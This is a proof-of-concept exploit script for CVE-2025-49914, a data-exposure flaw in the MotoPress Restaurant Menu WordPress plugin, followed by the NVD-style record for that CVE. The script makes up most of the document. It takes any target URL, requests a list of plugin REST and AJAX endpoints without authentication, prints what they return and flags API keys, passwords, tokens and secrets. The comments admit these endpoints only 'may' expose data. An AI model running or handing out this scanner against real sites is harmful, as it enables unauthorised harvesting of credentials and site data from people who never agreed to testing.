CVE-2025-49914

#!/usr/bin/env python3 """ CVE-2025-49914 PoC - MotoPress Restaurant Menu Sensitive Information Exposure Usage: python3 cve-2025-49914_poc.py <target_url> Note: This PoC is for educational and authorized testing purposes only. """ import requests import sys import json def exploit_cve_2025_49914(target_url): """Exploit for CVE-2025-49914 - Sensitive Information Exposure""" # Target endpoints that may expose sensitive data endpoints = [ '/wp-json/mp-restaurant-menu/v1/menu', '/wp-json/mp-restaurant-menu/v1/settings', '/wp-json/mp-restaurant-menu/v1/orders', '/?rest_route=/mp-restaurant-menu/v1/menu', '/?rest_route=/mp-restaurant-menu/v1/settings', '/wp-admin/admin-ajax.php?action=mp_restaurant_menu_get_data' ] print(f'[*] Target: {target_url}') print(f'[*] Exploiting CVE-2025-49914...') print('-' * 60) for endpoint in endpoints: url = target_url.rstrip('/') + endpoint print(f'\n[*] Testing endpoint: {endpoint}') try: # GET request to retrieve potentially sensitive data response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: try: data = response.json() print(f'[+] Potential sensitive data found at {endpoint}') print(f'[+] Response preview: {json.dumps(data, indent=2)[:500]}') # Check for sensitive keywords in response sensitive_keywords = ['api_key', 'password', 'secret', 'token', 'credential', 'db_', 'key'] response_str = json.dumps(data).lower() for keyword in sensitive_keywords: if keyword in response_str: print(f'[!!] WARNING: Sensitive keyword "{keyword}" detected in response!') except json.JSONDecodeError: print(f'[+] Non-JSON response (length: {len(response.text)})') if 'password' in response.text.lower() or 'api_key' in response.text.lower(): print('[!!] WARNING: Potential credentials in response!') elif response.status_code == 401 or response.status_code == 403: print(f'[-] Endpoint requires authentication: {response.status_code}') else: print(f'[-] Endpoint returned: {response.status_code}') except requests.exceptions.RequestException as e: print(f'[-] Error accessing {endpoint}: {e}') print('\n[*] Scan complete. Check results above for sensitive data exposure.') if __name__ == '__main__': if len(sys.argv) != 2: print(f'Usage: python3 {sys.argv[0]} <target_url>') print('Example: python3 cve-2025-49914_poc.py http://example.com') sys.exit(1) target = sys.argv[1] exploit_cve_2025_49914(target)

{"cve": {"id": "CVE-2025-49914", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:15:51.957", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in jetmonsters Restaurant Menu by MotoPress mp-restaurant-menu allows Retrieve Embedded Sensitive Data.This issue affects Restaurant Menu by MotoPress: from n/a through <= 2.4.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/mp-restaurant-menu/vulnerability/wordpress-restaurant-menu-by-motopress-plugin-2-4-7-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}